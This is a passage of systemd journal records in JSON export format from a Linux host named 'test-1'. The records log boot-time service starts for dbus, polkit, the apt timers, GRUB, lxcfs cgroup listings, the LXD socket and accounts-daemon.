"_PID" : "790", "_UID" : "103", "_GID" : "107", "_COMM" : "dbus-daemon", "_EXE" : "/usr/bin/dbus-daemon", "_CMDLINE" : "/usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only", "_CAP_EFFECTIVE" : "20000000", "_SYSTEMD_CGROUP" : "/system.slice/dbus.service", "_SYSTEMD_UNIT" : "dbus.service", "_SYSTEMD_INVOCATION_ID" : "ade09c21b8de4fb6a382892237c7d413", "MESSAGE" : "[system] Activating via systemd: service name='org.freedesktop.PolicyKit1' unit='polkit.service' requested by ':1.4' (uid=0 pid=786 comm=\"/usr/lib/accountsservice/accounts-daemon \" label=\"unconfined\")", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818366298" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2e8;b=e2b08827b5804427b422c10c84f1567e;m=2a5f763;t=5bd16df6976cb;x=975c82288defccda", "__REALTIME_TIMESTAMP" : "1615280818714315", "__MONOTONIC_TIMESTAMP" : "44431203", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Started Daily apt download activities.", "UNIT" : "apt-daily.timer", "INVOCATION_ID" : "95548d7e62714445aee757aca3c79eb9", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817951929" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2e9;b=e2b08827b5804427b422c10c84f1567e;m=2a5f7ec;t=5bd16df697753;x=dba300a7ab8017ea", "__REALTIME_TIMESTAMP" : "1615280818714451", "__MONOTONIC_TIMESTAMP" : "44431340", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "polkitd", "SYSLOG_PID" : "823", "MESSAGE" : "started daemon version 0.105 using authority implementation `local' version `0.105'", "_PID" : "823", "_COMM" : "polkitd", "_EXE" : "/usr/lib/policykit-1/polkitd", "_CMDLINE" : "/usr/lib/policykit-1/polkitd --no-debug", "_SYSTEMD_CGROUP" : "/system.slice/polkit.service", "_SYSTEMD_UNIT" : "polkit.service", "_SYSTEMD_INVOCATION_ID" : "f8c33888140c415190c7d25f87c0b41e", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818552346" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2ea;b=e2b08827b5804427b422c10c84f1567e;m=2a5f925;t=5bd16df69788c;x=74aecea21f3d04f8", "__REALTIME_TIMESTAMP" : "1615280818714764", "__MONOTONIC_TIMESTAMP" : "44431653", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "147c3fcb1fd64c35bb2ad71aaf67c98f", "SYSLOG_IDENTIFIER" : "grub-common", "MESSAGE" : " * Recording successful boot for GRUB", "_PID" : "788", "_SYSTEMD_UNIT" : "grub-common.service", "_SYSTEMD_INVOCATION_ID" : "ba0792509caa4bd78d4591f02aac479a" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2eb;b=e2b08827b5804427b422c10c84f1567e;m=2a5f925;t=5bd16df69788c;x=af6dda4d3d12f932", "__REALTIME_TIMESTAMP" : "1615280818714764", "__MONOTONIC_TIMESTAMP" : "44431653", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_TRANSPORT" : "stdout", "MESSAGE" : " ...done.", "_HOSTNAME" : "test-1", "_STREAM_ID" : "147c3fcb1fd64c35bb2ad71aaf67c98f", "SYSLOG_IDENTIFIER" : "grub-common", "_PID" : "788", "_SYSTEMD_UNIT" : "grub-common.service", "_SYSTEMD_INVOCATION_ID" : "ba0792509caa4bd78d4591f02aac479a" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2ec;b=e2b08827b5804427b422c10c84f1567e;m=2a60023;t=5bd16df697f8b;x=17aed942f3125518", "__REALTIME_TIMESTAMP" : "1615280818716555", "__MONOTONIC_TIMESTAMP" : "44433443", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Started Daily apt upgrade and clean activities.", "UNIT" : "apt-daily-upgrade.timer", "INVOCATION_ID" : "a52729bb66a64f499069fb0631cf1115", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817959873" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2ed;b=e2b08827b5804427b422c10c84f1567e;m=2a600ad;t=5bd16df698014;x=b194780a247cfb8e", "__REALTIME_TIMESTAMP" : "1615280818716692", "__MONOTONIC_TIMESTAMP" : "44433581", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "dbus-daemon", "SYSLOG_PID" : "790", "_PID" : "790", "_UID" : "103", "_GID" : "107", "_COMM" : "dbus-daemon", "_EXE" : "/usr/bin/dbus-daemon", "_CMDLINE" : "/usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only", "_CAP_EFFECTIVE" : "20000000", "_SYSTEMD_CGROUP" : "/system.slice/dbus.service", "_SYSTEMD_UNIT" : "dbus.service", "_SYSTEMD_INVOCATION_ID" : "ade09c21b8de4fb6a382892237c7d413", "MESSAGE" : "[system] Successfully activated service 'org.freedesktop.PolicyKit1'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818552765" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2ee;b=e2b08827b5804427b422c10c84f1567e;m=2a60192;t=5bd16df6980fa;x=d09af9eacaa4a0f4", "__REALTIME_TIMESTAMP" : "1615280818716922", "__MONOTONIC_TIMESTAMP" : "44433810", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "3c20edf1c9f34d15adab2b3f4b36a654", "SYSLOG_IDENTIFIER" : "lxcfs", "MESSAGE" : "mount namespace: 5", "_PID" : "789", "_COMM" : "lxcfs", "_EXE" : "/usr/bin/lxcfs", "_CMDLINE" : "/usr/bin/lxcfs /var/lib/lxcfs/", "_SYSTEMD_CGROUP" : "/system.slice/lxcfs.service", "_SYSTEMD_UNIT" : "lxcfs.service", "_SYSTEMD_INVOCATION_ID" : "6b09b6542bb74a3aa4be9634bca4d61c" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2ef;b=e2b08827b5804427b422c10c84f1567e;m=2a60192;t=5bd16df6980fa;x=eeeec5f11f290678", "__REALTIME_TIMESTAMP" : "1615280818716922", "__MONOTONIC_TIMESTAMP" : "44433810", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "3c20edf1c9f34d15adab2b3f4b36a654", "SYSLOG_IDENTIFIER" : "lxcfs", "_PID" : "789", "_COMM" : "lxcfs", "_EXE" : "/usr/bin/lxcfs", "_CMDLINE" : "/usr/bin/lxcfs /var/lib/lxcfs/", "_SYSTEMD_CGROUP" : "/system.slice/lxcfs.service", "_SYSTEMD_UNIT" : "lxcfs.service", "_SYSTEMD_INVOCATION_ID" : "6b09b6542bb74a3aa4be9634bca4d61c", "MESSAGE" : "hierarchies:" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2f0;b=e2b08827b5804427b422c10c84f1567e;m=2a60192;t=5bd16df6980fa;x=bc1ac33be7425c42", "__REALTIME_TIMESTAMP" : "1615280818716922", "__MONOTONIC_TIMESTAMP" : "44433810", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "3c20edf1c9f34d15adab2b3f4b36a654", "SYSLOG_IDENTIFIER" : "lxcfs", "_PID" : "789", "_COMM" : "lxcfs", "_EXE" : "/usr/bin/lxcfs", "_CMDLINE" : "/usr/bin/lxcfs /var/lib/lxcfs/", "_SYSTEMD_CGROUP" : "/system.slice/lxcfs.service", "_SYSTEMD_UNIT" : "lxcfs.service", "_SYSTEMD_INVOCATION_ID" : "6b09b6542bb74a3aa4be9634bca4d61c", "MESSAGE" : " 0: fd: 6: perf_event" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2f1;b=e2b08827b5804427b422c10c84f1567e;m=2a60192;t=5bd16df6980fa;x=28537ce1469cc4b2", "__REALTIME_TIMESTAMP" : "1615280818716922", "__MONOTONIC_TIMESTAMP" : "44433810", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "3c20edf1c9f34d15adab2b3f4b36a654", "SYSLOG_IDENTIFIER" : "lxcfs", "_PID" : "789", "_COMM" : "lxcfs", "_EXE" : "/usr/bin/lxcfs", "_CMDLINE" : "/usr/bin/lxcfs /var/lib/lxcfs/", "_SYSTEMD_CGROUP" : "/system.slice/lxcfs.service", "_SYSTEMD_UNIT" : "lxcfs.service", "_SYSTEMD_INVOCATION_ID" : "6b09b6542bb74a3aa4be9634bca4d61c", "MESSAGE" : " 1: fd: 7: pids" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2f2;b=e2b08827b5804427b422c10c84f1567e;m=2a60192;t=5bd16df6980fa;x=dd9f84cd45211f80", "__REALTIME_TIMESTAMP" : "1615280818716922", "__MONOTONIC_TIMESTAMP" : "44433810", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "3c20edf1c9f34d15adab2b3f4b36a654", "SYSLOG_IDENTIFIER" : "lxcfs", "_PID" : "789", "_COMM" : "lxcfs", "_EXE" : "/usr/bin/lxcfs", "_CMDLINE" : "/usr/bin/lxcfs /var/lib/lxcfs/", "_SYSTEMD_CGROUP" : "/system.slice/lxcfs.service", "_SYSTEMD_UNIT" : "lxcfs.service", "_SYSTEMD_INVOCATION_ID" : "6b09b6542bb74a3aa4be9634bca4d61c", "MESSAGE" : " 2: fd: 8: hugetlb" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2f3;b=e2b08827b5804427b422c10c84f1567e;m=2a60192;t=5bd16df6980fa;x=c60b3b8e02b0ff6e", "__REALTIME_TIMESTAMP" : "1615280818716922", "__MONOTONIC_TIMESTAMP" : "44433810", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "3c20edf1c9f34d15adab2b3f4b36a654", "SYSLOG_IDENTIFIER" : "lxcfs", "_PID" : "789", "_COMM" : "lxcfs", "_EXE" : "/usr/bin/lxcfs", "_CMDLINE" : "/usr/bin/lxcfs /var/lib/lxcfs/", "_SYSTEMD_CGROUP" : "/system.slice/lxcfs.service", "_SYSTEMD_UNIT" : "lxcfs.service", "_SYSTEMD_INVOCATION_ID" : "6b09b6542bb74a3aa4be9634bca4d61c", "MESSAGE" : " 3: fd: 9: freezer" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2f4;b=e2b08827b5804427b422c10c84f1567e;m=2a60192;t=5bd16df6980fa;x=e0b682b06fac3a58", "__REALTIME_TIMESTAMP" : "1615280818716922", "__MONOTONIC_TIMESTAMP" : "44433810", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "3c20edf1c9f34d15adab2b3f4b36a654", "SYSLOG_IDENTIFIER" : "lxcfs", "_PID" : "789", "_COMM" : "lxcfs", "_EXE" : "/usr/bin/lxcfs", "_CMDLINE" : "/usr/bin/lxcfs /var/lib/lxcfs/", "_SYSTEMD_CGROUP" : "/system.slice/lxcfs.service", "_SYSTEMD_UNIT" : "lxcfs.service", "_SYSTEMD_INVOCATION_ID" : "6b09b6542bb74a3aa4be9634bca4d61c", "MESSAGE" : " 4: fd: 10: memory" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2f5;b=e2b08827b5804427b422c10c84f1567e;m=2a60192;t=5bd16df6980fa;x=7fef776a74e9508e", "__REALTIME_TIMESTAMP" : "1615280818716922", "__MONOTONIC_TIMESTAMP" : "44433810", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "3c20edf1c9f34d15adab2b3f4b36a654", "SYSLOG_IDENTIFIER" : "lxcfs", "_PID" : "789", "_COMM" : "lxcfs", "_EXE" : "/usr/bin/lxcfs", "_CMDLINE" : "/usr/bin/lxcfs /var/lib/lxcfs/", "_SYSTEMD_CGROUP" : "/system.slice/lxcfs.service", "_SYSTEMD_UNIT" : "lxcfs.service", "_SYSTEMD_INVOCATION_ID" : "6b09b6542bb74a3aa4be9634bca4d61c", "MESSAGE" : " 5: fd: 11: cpu,cpuacct" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2f6;b=e2b08827b5804427b422c10c84f1567e;m=2a60192;t=5bd16df6980fa;x=20ea5d2e14d8f9bf", "__REALTIME_TIMESTAMP" : "1615280818716922", "__MONOTONIC_TIMESTAMP" : "44433810", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "3c20edf1c9f34d15adab2b3f4b36a654", "SYSLOG_IDENTIFIER" : "lxcfs", "_PID" : "789", "_COMM" : "lxcfs", "_EXE" : "/usr/bin/lxcfs", "_CMDLINE" : "/usr/bin/lxcfs /var/lib/lxcfs/", "_SYSTEMD_CGROUP" : "/system.slice/lxcfs.service", "_SYSTEMD_UNIT" : "lxcfs.service", "_SYSTEMD_INVOCATION_ID" : "6b09b6542bb74a3aa4be9634bca4d61c", "MESSAGE" : " 6: fd: 12: devices" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2f7;b=e2b08827b5804427b422c10c84f1567e;m=2a60192;t=5bd16df6980fa;x=adb7445415f5f078", "__REALTIME_TIMESTAMP" : "1615280818716922", "__MONOTONIC_TIMESTAMP" : "44433810", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "3c20edf1c9f34d15adab2b3f4b36a654", "SYSLOG_IDENTIFIER" : "lxcfs", "_PID" : "789", "_COMM" : "lxcfs", "_EXE" : "/usr/bin/lxcfs", "_CMDLINE" : "/usr/bin/lxcfs /var/lib/lxcfs/", "_SYSTEMD_CGROUP" : "/system.slice/lxcfs.service", "_SYSTEMD_UNIT" : "lxcfs.service", "_SYSTEMD_INVOCATION_ID" : "6b09b6542bb74a3aa4be9634bca4d61c", "MESSAGE" : " 7: fd: 13: net_cls,net_prio" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2f8;b=e2b08827b5804427b422c10c84f1567e;m=2a60192;t=5bd16df6980fa;x=be4fe76ac79fe950", "__REALTIME_TIMESTAMP" : "1615280818716922", "__MONOTONIC_TIMESTAMP" : "44433810", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "3c20edf1c9f34d15adab2b3f4b36a654", "SYSLOG_IDENTIFIER" : "lxcfs", "_PID" : "789", "_COMM" : "lxcfs", "_EXE" : "/usr/bin/lxcfs", "_CMDLINE" : "/usr/bin/lxcfs /var/lib/lxcfs/", "_SYSTEMD_CGROUP" : "/system.slice/lxcfs.service", "_SYSTEMD_UNIT" : "lxcfs.service", "_SYSTEMD_INVOCATION_ID" : "6b09b6542bb74a3aa4be9634bca4d61c", "MESSAGE" : " 8: fd: 14: blkio" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2f9;b=e2b08827b5804427b422c10c84f1567e;m=2a60192;t=5bd16df6980fa;x=b6e830dc214e9808", "__REALTIME_TIMESTAMP" : "1615280818716922", "__MONOTONIC_TIMESTAMP" : "44433810", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "3c20edf1c9f34d15adab2b3f4b36a654", "SYSLOG_IDENTIFIER" : "lxcfs", "_PID" : "789", "_COMM" : "lxcfs", "_EXE" : "/usr/bin/lxcfs", "_CMDLINE" : "/usr/bin/lxcfs /var/lib/lxcfs/", "_SYSTEMD_CGROUP" : "/system.slice/lxcfs.service", "_SYSTEMD_UNIT" : "lxcfs.service", "_SYSTEMD_INVOCATION_ID" : "6b09b6542bb74a3aa4be9634bca4d61c", "MESSAGE" : " 9: fd: 15: rdma" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2fa;b=e2b08827b5804427b422c10c84f1567e;m=2a60192;t=5bd16df6980fa;x=54723fbc28f831a1", "__REALTIME_TIMESTAMP" : "1615280818716922", "__MONOTONIC_TIMESTAMP" : "44433810", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "3c20edf1c9f34d15adab2b3f4b36a654", "SYSLOG_IDENTIFIER" : "lxcfs", "_PID" : "789", "_COMM" : "lxcfs", "_EXE" : "/usr/bin/lxcfs", "_CMDLINE" : "/usr/bin/lxcfs /var/lib/lxcfs/", "_SYSTEMD_CGROUP" : "/system.slice/lxcfs.service", "_SYSTEMD_UNIT" : "lxcfs.service", "_SYSTEMD_INVOCATION_ID" : "6b09b6542bb74a3aa4be9634bca4d61c", "MESSAGE" : " 10: fd: 16: cpuset" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2fb;b=e2b08827b5804427b422c10c84f1567e;m=2a60192;t=5bd16df6980fa;x=4088854d132749ea", "__REALTIME_TIMESTAMP" : "1615280818716922", "__MONOTONIC_TIMESTAMP" : "44433810", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "3c20edf1c9f34d15adab2b3f4b36a654", "SYSLOG_IDENTIFIER" : "lxcfs", "_PID" : "789", "_COMM" : "lxcfs", "_EXE" : "/usr/bin/lxcfs", "_CMDLINE" : "/usr/bin/lxcfs /var/lib/lxcfs/", "_SYSTEMD_CGROUP" : "/system.slice/lxcfs.service", "_SYSTEMD_UNIT" : "lxcfs.service", "_SYSTEMD_INVOCATION_ID" : "6b09b6542bb74a3aa4be9634bca4d61c", "MESSAGE" : " 11: fd: 17: name=systemd" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2fc;b=e2b08827b5804427b422c10c84f1567e;m=2a60192;t=5bd16df6980fa;x=47878a04061de12c", "__REALTIME_TIMESTAMP" : "1615280818716922", "__MONOTONIC_TIMESTAMP" : "44433810", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "3c20edf1c9f34d15adab2b3f4b36a654", "SYSLOG_IDENTIFIER" : "lxcfs", "_PID" : "789", "_COMM" : "lxcfs", "_EXE" : "/usr/bin/lxcfs", "_CMDLINE" : "/usr/bin/lxcfs /var/lib/lxcfs/", "_SYSTEMD_CGROUP" : "/system.slice/lxcfs.service", "_SYSTEMD_UNIT" : "lxcfs.service", "_SYSTEMD_INVOCATION_ID" : "6b09b6542bb74a3aa4be9634bca4d61c", "MESSAGE" : " 12: fd: 18: unified" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2fd;b=e2b08827b5804427b422c10c84f1567e;m=2a60c68;t=5bd16df698bcf;x=1cb1f21d0102939d", "__REALTIME_TIMESTAMP" : "1615280818719695", "__MONOTONIC_TIMESTAMP" : "44436584", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting LXD - unix socket.", "UNIT" : "lxd.socket", "INVOCATION_ID" : "0744372decba4f1bbe6fe5d4a8841f90", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817978451" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2fe;b=e2b08827b5804427b422c10c84f1567e;m=2a60cc8;t=5bd16df698c2f;x=fdfd154cd83f54ad", "__REALTIME_TIMESTAMP" : "1615280818719791", "__MONOTONIC_TIMESTAMP" : "44436680", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "accounts-daemon", "SYSLOG_PID" : "786", "MESSAGE" : "started daemon version 0.6.45", "_PID" : "786", "_COMM" : "accounts-daemon", "_EXE" : "/usr/lib/accountsservice/accounts-daemon", "_CMDLINE" : "/usr/lib/accountsservice/accounts-daemon", "_SYSTEMD_CGROUP" : "/system.slice/accounts-daemon.service", "_SYSTEMD_UNIT" : "accounts-daemon.service", "_SYSTEMD_INVOCATION_ID" : "fb8c38edec2345e7ac064ca6e9088f83", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818556640" } { "__CURSOR" : 